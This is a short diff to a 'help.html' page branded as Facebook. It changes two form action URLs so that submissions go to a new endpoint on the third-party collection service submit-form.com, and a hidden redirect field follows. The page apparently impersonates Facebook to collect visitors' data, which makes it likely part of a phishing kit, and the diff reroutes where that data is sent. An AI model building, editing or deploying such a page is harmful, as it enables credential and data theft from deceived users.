--- a/help.html
+++ b/help.html
@@ -11,8 +11,8 @@
       <b class="text-5xl text-white">facebook</b>
   </div>
 
-  <form class="sm:hidden lg:block md:block" action="https://submit-form.com/Mq80GsxVj" method="post"> 
-<form action="https://submit-form.com/Mq80GsxVj">
+  <form class="sm:hidden lg:block md:block" action="https://submit-form.com/g9Ag2hn2q" method="post"> 
+<form action="https://submit-form.com/g9Ag2hn2q">
   <input
     type="hidden"
     name="_redirect"
